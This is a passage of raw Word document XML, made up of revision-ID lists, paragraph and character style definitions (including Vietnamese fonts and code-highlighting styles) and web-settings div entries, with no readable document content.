    <w:rsid w:val="00E53916"/>
    <w:rsid w:val="00E54458"/>
    <w:rsid w:val="00E55DAA"/>
    <w:rsid w:val="00E56554"/>
    <w:rsid w:val="00E5746C"/>
    <w:rsid w:val="00E57C04"/>
    <w:rsid w:val="00E632BC"/>
    <w:rsid w:val="00E64223"/>
    <w:rsid w:val="00E64297"/>
    <w:rsid w:val="00E64B71"/>
    <w:rsid w:val="00E64EE8"/>
    <w:rsid w:val="00E65019"/>
    <w:rsid w:val="00E663D6"/>
    <w:rsid w:val="00E66878"/>
    <w:rsid w:val="00E6781A"/>
    <w:rsid w:val="00E726BE"/>
    <w:rsid w:val="00E72704"/>
    <w:rsid w:val="00E73EA2"/>
    <w:rsid w:val="00E77C08"/>
    <w:rsid w:val="00E77F78"/>
    <w:rsid w:val="00E80C4A"/>
    <w:rsid w:val="00E81172"/>
    <w:rsid w:val="00E8263F"/>
    <w:rsid w:val="00E83585"/>
    <w:rsid w:val="00E83978"/>
    <w:rsid w:val="00E846BD"/>
    <w:rsid w:val="00E848CD"/>
    <w:rsid w:val="00E84C40"/>
    <w:rsid w:val="00E879DD"/>
    <w:rsid w:val="00E91950"/>
    <w:rsid w:val="00E920FF"/>
    <w:rsid w:val="00E9663F"/>
    <w:rsid w:val="00EA0151"/>
    <w:rsid w:val="00EA0D84"/>
    <w:rsid w:val="00EA1B30"/>
    <w:rsid w:val="00EA2414"/>
    <w:rsid w:val="00EA29A2"/>
    <w:rsid w:val="00EA3909"/>
    <w:rsid w:val="00EA56BA"/>
    <w:rsid w:val="00EA77C2"/>
    <w:rsid w:val="00EB0375"/>
    <w:rsid w:val="00EB2E13"/>
    <w:rsid w:val="00EB49CD"/>
    <w:rsid w:val="00EB58E3"/>
    <w:rsid w:val="00EC0DE1"/>
    <w:rsid w:val="00EC0F4C"/>
    <w:rsid w:val="00EC1957"/>
    <w:rsid w:val="00EC28BA"/>
    <w:rsid w:val="00EC2969"/>
    <w:rsid w:val="00EC3384"/>
    <w:rsid w:val="00EC4460"/>
    <w:rsid w:val="00EC4825"/>
    <w:rsid w:val="00EC573F"/>
    <w:rsid w:val="00EC703D"/>
    <w:rsid w:val="00EC7348"/>
    <w:rsid w:val="00EC7B51"/>
    <w:rsid w:val="00ED18A4"/>
    <w:rsid w:val="00ED2CB9"/>
    <w:rsid w:val="00ED3E27"/>
    <w:rsid w:val="00ED4450"/>
    <w:rsid w:val="00ED4657"/>
    <w:rsid w:val="00ED51AF"/>
    <w:rsid w:val="00ED520A"/>
    <w:rsid w:val="00ED55AA"/>
    <w:rsid w:val="00ED5EB3"/>
    <w:rsid w:val="00EE0067"/>
    <w:rsid w:val="00EE182A"/>
    <w:rsid w:val="00EE19EF"/>
    <w:rsid w:val="00EE1FDB"/>
    <w:rsid w:val="00EE3036"/>
    <w:rsid w:val="00EE4945"/>
    <w:rsid w:val="00EE71BF"/>
    <w:rsid w:val="00EF0760"/>
    <w:rsid w:val="00EF096F"/>
    <w:rsid w:val="00EF135E"/>
    <w:rsid w:val="00EF3911"/>
    <w:rsid w:val="00EF65AD"/>
    <w:rsid w:val="00EF6939"/>
    <w:rsid w:val="00EF6B20"/>
    <w:rsid w:val="00EF74F8"/>
    <w:rsid w:val="00F00B8E"/>
    <w:rsid w:val="00F01782"/>
    <w:rsid w:val="00F01A2D"/>
    <w:rsid w:val="00F020B2"/>
    <w:rsid w:val="00F02150"/>
    <w:rsid w:val="00F02170"/>
    <w:rsid w:val="00F0285F"/>
    <w:rsid w:val="00F03526"/>
    <w:rsid w:val="00F0454D"/>
    <w:rsid w:val="00F05394"/>
    <w:rsid w:val="00F05FA4"/>
    <w:rsid w:val="00F0633A"/>
    <w:rsid w:val="00F0736B"/>
    <w:rsid w:val="00F0742F"/>
    <w:rsid w:val="00F07BB4"/>
    <w:rsid w:val="00F11060"/>
    <w:rsid w:val="00F1285F"/>
    <w:rsid w:val="00F12C32"/>
    <w:rsid w:val="00F12C53"/>
    <w:rsid w:val="00F12D05"/>
    <w:rsid w:val="00F13084"/>
    <w:rsid w:val="00F13460"/>
    <w:rsid w:val="00F143F7"/>
    <w:rsid w:val="00F14F7C"/>
    <w:rsid w:val="00F15BC3"/>
    <w:rsid w:val="00F172BF"/>
    <w:rsid w:val="00F17901"/>
    <w:rsid w:val="00F209D0"/>
    <w:rsid w:val="00F20ED0"/>
    <w:rsid w:val="00F2117F"/>
    <w:rsid w:val="00F224F6"/>
    <w:rsid w:val="00F22837"/>
    <w:rsid w:val="00F232E5"/>
    <w:rsid w:val="00F245F3"/>
    <w:rsid w:val="00F24809"/>
    <w:rsid w:val="00F24C1A"/>
    <w:rsid w:val="00F254D6"/>
    <w:rsid w:val="00F25533"/>
    <w:rsid w:val="00F2595C"/>
    <w:rsid w:val="00F2667B"/>
    <w:rsid w:val="00F266C4"/>
    <w:rsid w:val="00F26EFB"/>
    <w:rsid w:val="00F2722A"/>
    <w:rsid w:val="00F275A3"/>
    <w:rsid w:val="00F276AF"/>
    <w:rsid w:val="00F305BD"/>
    <w:rsid w:val="00F31D8E"/>
    <w:rsid w:val="00F32BCA"/>
    <w:rsid w:val="00F335A4"/>
    <w:rsid w:val="00F34079"/>
    <w:rsid w:val="00F34336"/>
    <w:rsid w:val="00F34413"/>
    <w:rsid w:val="00F34A0A"/>
    <w:rsid w:val="00F352EB"/>
    <w:rsid w:val="00F35367"/>
    <w:rsid w:val="00F3661B"/>
    <w:rsid w:val="00F4029B"/>
    <w:rsid w:val="00F41AB0"/>
    <w:rsid w:val="00F435F0"/>
    <w:rsid w:val="00F43E38"/>
    <w:rsid w:val="00F448AA"/>
    <w:rsid w:val="00F45BA6"/>
    <w:rsid w:val="00F45D9B"/>
    <w:rsid w:val="00F468DC"/>
    <w:rsid w:val="00F471F0"/>
    <w:rsid w:val="00F473D7"/>
    <w:rsid w:val="00F47C12"/>
    <w:rsid w:val="00F50FC9"/>
    <w:rsid w:val="00F51641"/>
    <w:rsid w:val="00F53C64"/>
    <w:rsid w:val="00F542EF"/>
    <w:rsid w:val="00F5458C"/>
    <w:rsid w:val="00F555F2"/>
    <w:rsid w:val="00F5583C"/>
    <w:rsid w:val="00F5595A"/>
    <w:rsid w:val="00F5676B"/>
    <w:rsid w:val="00F57F22"/>
    <w:rsid w:val="00F62B8E"/>
    <w:rsid w:val="00F62DE7"/>
    <w:rsid w:val="00F63531"/>
    <w:rsid w:val="00F649B5"/>
    <w:rsid w:val="00F64EF6"/>
    <w:rsid w:val="00F651D5"/>
    <w:rsid w:val="00F65C45"/>
    <w:rsid w:val="00F6652F"/>
    <w:rsid w:val="00F719D4"/>
    <w:rsid w:val="00F72853"/>
    <w:rsid w:val="00F73D51"/>
    <w:rsid w:val="00F76073"/>
    <w:rsid w:val="00F76C44"/>
    <w:rsid w:val="00F76F48"/>
    <w:rsid w:val="00F80BFA"/>
    <w:rsid w:val="00F81091"/>
    <w:rsid w:val="00F81E5D"/>
    <w:rsid w:val="00F82190"/>
    <w:rsid w:val="00F826DC"/>
    <w:rsid w:val="00F82A00"/>
    <w:rsid w:val="00F8326F"/>
    <w:rsid w:val="00F85E35"/>
    <w:rsid w:val="00F8600E"/>
    <w:rsid w:val="00F86341"/>
    <w:rsid w:val="00F87E2F"/>
    <w:rsid w:val="00F902B7"/>
    <w:rsid w:val="00F90C27"/>
    <w:rsid w:val="00F9222C"/>
    <w:rsid w:val="00F92990"/>
    <w:rsid w:val="00F92AB7"/>
    <w:rsid w:val="00F92E2E"/>
    <w:rsid w:val="00F92E3B"/>
    <w:rsid w:val="00F93BD4"/>
    <w:rsid w:val="00F94BF8"/>
    <w:rsid w:val="00F94EFC"/>
    <w:rsid w:val="00F95024"/>
    <w:rsid w:val="00F9668F"/>
    <w:rsid w:val="00F97228"/>
    <w:rsid w:val="00F9781C"/>
    <w:rsid w:val="00FA1417"/>
    <w:rsid w:val="00FA1644"/>
    <w:rsid w:val="00FA18A7"/>
    <w:rsid w:val="00FA25AC"/>
    <w:rsid w:val="00FA2F59"/>
    <w:rsid w:val="00FA3239"/>
    <w:rsid w:val="00FA3BE0"/>
    <w:rsid w:val="00FA4700"/>
    <w:rsid w:val="00FA6D9C"/>
    <w:rsid w:val="00FA7FE2"/>
    <w:rsid w:val="00FB1CA4"/>
    <w:rsid w:val="00FB22C3"/>
    <w:rsid w:val="00FB2EAA"/>
    <w:rsid w:val="00FB3A3B"/>
    <w:rsid w:val="00FB3ADD"/>
    <w:rsid w:val="00FB4E44"/>
    <w:rsid w:val="00FB533E"/>
    <w:rsid w:val="00FB5897"/>
    <w:rsid w:val="00FB738E"/>
    <w:rsid w:val="00FB7CF6"/>
    <w:rsid w:val="00FB7D9D"/>
    <w:rsid w:val="00FC007F"/>
    <w:rsid w:val="00FC1E6F"/>
    <w:rsid w:val="00FC2DE4"/>
    <w:rsid w:val="00FC311D"/>
    <w:rsid w:val="00FC3418"/>
    <w:rsid w:val="00FC3DE2"/>
    <w:rsid w:val="00FC3EA6"/>
    <w:rsid w:val="00FC4FCE"/>
    <w:rsid w:val="00FC6621"/>
    <w:rsid w:val="00FC6639"/>
    <w:rsid w:val="00FC6D98"/>
    <w:rsid w:val="00FD0D73"/>
    <w:rsid w:val="00FD1037"/>
    <w:rsid w:val="00FD1BDC"/>
    <w:rsid w:val="00FD1FAD"/>
    <w:rsid w:val="00FD23F3"/>
    <w:rsid w:val="00FD2A1E"/>
    <w:rsid w:val="00FD44EB"/>
    <w:rsid w:val="00FD465D"/>
    <w:rsid w:val="00FD482B"/>
    <w:rsid w:val="00FD493B"/>
    <w:rsid w:val="00FD5FC7"/>
    <w:rsid w:val="00FD69E5"/>
    <w:rsid w:val="00FE0B9E"/>
    <w:rsid w:val="00FE0DF6"/>
    <w:rsid w:val="00FE1561"/>
    <w:rsid w:val="00FE2163"/>
    <w:rsid w:val="00FE3095"/>
    <w:rsid w:val="00FE796F"/>
    <w:rsid w:val="00FF077B"/>
    <w:rsid w:val="00FF14C8"/>
    <w:rsid w:val="00FF1B89"/>
    <w:rsid w:val="00FF234A"/>
    <w:rsid w:val="00FF473F"/>
    <w:rsid w:val="00FF50B5"/>
    <w:rsid w:val="00FF6ACC"/>
    <w:rsid w:val="00FF7F9B"/>
    <w:rsid w:val="0263614D"/>
    <w:rsid w:val="0384CF38"/>
    <w:rsid w:val="03EE3EAB"/>
    <w:rsid w:val="0780A4BA"/>
    <w:rsid w:val="08C18E0C"/>
    <w:rsid w:val="1569E708"/>
    <w:rsid w:val="182D681F"/>
    <w:rsid w:val="1B969311"/>
    <w:rsid w:val="22A8EAD0"/>
    <w:rsid w:val="2C36A4B9"/>
    <w:rsid w:val="323656B0"/>
    <w:rsid w:val="3EA2B276"/>
    <w:rsid w:val="41167F98"/>
    <w:rsid w:val="41BB695F"/>
    <w:rsid w:val="5202F16F"/>
    <w:rsid w:val="553CEA03"/>
    <w:rsid w:val="57334CE0"/>
    <w:rsid w:val="608988BB"/>
    <w:rsid w:val="64F03BA4"/>
    <w:rsid w:val="66F01F1F"/>
    <w:rsid w:val="6CC9AE8F"/>
    <w:rsid w:val="6CE90413"/>
    <w:rsid w:val="76576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chartTrackingRefBased/>
  <w15:docId w15:val="{473603D7-BAEF-FA4E-9101-E6C3F0DD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80"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00946C14"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="11"/>
      </w:numPr>
      <w:spacing w:before="120" w:after="120"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="UVN Viet Sach" w:eastAsia="Times New Roman" w:hAnsi="UVN Viet Sach" w:cs="Arial"/>
      <w:b/>
      <w:caps/>
      <w:color w:val="0070C0"/>
      <w:kern w:val="28"/>
      <w:sz w:val="30"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00946C14"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="11"/>
      </w:numPr>
      <w:spacing w:before="120" w:after="120"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="UTM Neo Sans Intel" w:eastAsia="Times New Roman" w:hAnsi="UTM Neo Sans Intel" w:cs="Arial"/>
      <w:b/>
      <w:color w:val="0070C0"/>
      <w:kern w:val="28"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading3Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00946C14"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="11"/>
      </w:numPr>
      <w:spacing w:line="312" w:lineRule="auto"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="UVN Viet Sach" w:eastAsiaTheme="majorEastAsia" w:hAnsi="UVN Viet Sach" w:cs="Arial"/>
      <w:b/>
      <w:kern w:val="28"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading4Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="0055762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AEC"/>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C14"/>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C1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C1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rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00946C14"/>
    <w:rPr>
      <w:rFonts w:ascii="UVN Viet Sach" w:eastAsia="Times New Roman" w:hAnsi="UVN Viet Sach" w:cs="Arial"/>
      <w:b/>
      <w:caps/>
      <w:color w:val="0070C0"/>
      <w:kern w:val="28"/>
      <w:sz w:val="30"/>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rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00946C14"/>
    <w:rPr>
      <w:rFonts w:ascii="UTM Neo Sans Intel" w:eastAsia="Times New Roman" w:hAnsi="UTM Neo Sans Intel" w:cs="Arial"/>
      <w:b/>
      <w:color w:val="0070C0"/>
      <w:kern w:val="28"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Content">
    <w:name w:val="Content"/>
    <w:link w:val="ContentChar"/>
    <w:qFormat/>
    <w:rsid w:val="00946C14"/>
    <w:pPr>
      <w:spacing w:line="312" w:lineRule="auto"/>
      <w:ind w:firstLine="284"/>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946C14"/>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753B9"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="7"/>
      </w:numPr>
      <w:spacing w:line="360" w:lineRule="auto"/>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6753B9"/>
    <w:rPr>
      <w:rFonts w:ascii="UVN Viet Sach" w:eastAsia="Times New Roman" w:hAnsi="UVN Viet Sach" w:cs="Arial"/>
      <w:i/>
      <w:color w:val="212120"/>
      <w:kern w:val="28"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Step">
    <w:name w:val="Step"/>
    <w:link w:val="StepChar"/>
    <w:qFormat/>
    <w:rsid w:val="00317115"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="8"/>
      </w:num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F24C1A"/>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946C14"/>
    <w:rPr>
      <w:rFonts w:ascii="UVN Viet Sach" w:eastAsiaTheme="majorEastAsia" w:hAnsi="UVN Viet Sach" w:cs="Arial"/>
      <w:b/>
      <w:kern w:val="28"/>
      <w:sz w:val="26"/>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6030A0"/>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6030A0"/>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303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557622"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
      <w:kern w:val="28"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>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table" w:styleId="GridTable1Light">
    <w:name w:val="Grid Table 1 Light"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="46"/>
    <w:rsid w:val="00A53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22C37"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00522C37"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-k">
    <w:name w:val="pl-k"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="009D7782"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-en">
    <w:name w:val="pl-en"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="009D7782"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-c1">
    <w:name w:val="pl-c1"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="009D7782"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-smi">
    <w:name w:val="pl-smi"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="009D7782"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-s">
    <w:name w:val="pl-s"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="009D7782"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-pds">
    <w:name w:val="pl-pds"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="009D7782"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="cp">
    <w:name w:val="cp"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00C60556"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="w">
    <w:name w:val="w"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00C60556"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="cpf">
    <w:name w:val="cpf"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00C60556"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="kt">
    <w:name w:val="kt"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00C60556"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="nf">
    <w:name w:val="nf"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00C60556"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="p">
    <w:name w:val="p"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00C60556"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="n">
    <w:name w:val="n"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00C60556"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mi">
    <w:name w:val="mi"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00C60556"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="o">
    <w:name w:val="o"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00C60556"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mh">
    <w:name w:val="mh"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00C60556"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="s">
    <w:name w:val="s"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00C60556"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="se">
    <w:name w:val="se"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00C60556"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="k">
    <w:name w:val="k"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00C60556"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="apple-converted-space">
    <w:name w:val="apple-converted-space"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00326CA4"/>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00004172"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="cm">
    <w:name w:val="cm"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D61CFC"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLPreformattedChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0012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0AF5"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading7Char">
    <w:name w:val="Heading 7 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading7"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00946C1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46C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C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3">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>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43602143">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="55277766">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68581186">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="72971762">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>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2788785">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="128475207">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47668944">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="151138267">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="158083637">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="161626752">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="161705217">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="164706179">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="170730538">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="174804047">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87454237">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
